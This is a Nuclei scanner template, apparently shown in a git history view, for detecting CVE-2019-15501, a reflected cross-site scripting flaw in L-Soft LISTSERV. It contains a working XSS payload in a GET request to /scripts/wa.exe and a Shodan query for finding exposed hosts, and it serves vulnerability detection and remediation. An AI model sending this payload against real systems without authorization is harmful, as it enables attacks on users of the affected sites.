nuclei-templates/http/cves/2019/CVE-2019-15501.yaml

57 lines
2.0 KiB
YAML
Raw Normal View History

2021-08-24 01:15:08 +00:00
id: CVE-2019-15501
info:
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
author: LogicalHunter,arafatansari
2021-08-24 01:15:08 +00:00
severity: medium
description: |
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade to a version of L-Soft LISTSERV that is higher than 16.5-2018a to mitigate the XSS vulnerability.
2021-08-24 11:43:37 +00:00
reference:
2021-08-24 11:37:33 +00:00
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2019-15501
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-15501
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00303
epss-percentile: 0.69072
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:53:28 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: lsoft
product: listserv
2023-09-06 12:53:28 +00:00
shodan-query: http.html:"LISTSERV"
2024-01-14 09:21:50 +00:00
tags: cve2019,cve,xss,listserv,edb,lsoft
2021-08-24 01:15:08 +00:00
http:
2021-08-24 01:15:08 +00:00
- method: GET
path:
2021-08-24 11:37:33 +00:00
- '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-08-24 01:15:08 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2021-08-24 01:15:08 +00:00
words:
2021-08-24 11:37:33 +00:00
- '</script><script>alert(document.domain)</script>'
- 'LISTSERV'
case-insensitive: true
2023-07-11 19:49:27 +00:00
condition: and
2021-08-24 01:15:08 +00:00
- type: word
part: header
2021-08-24 11:37:33 +00:00
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022018ab4dd37c194955c9cc42951fa54fdb7b8effe30fc756d12a64d7a3ea1b9f77022100aaaee8c74c323286576af892c10a4c9abe2198d4b5e27a8114266c66dfb52357:922c64590222798bb761d5b6d8e72950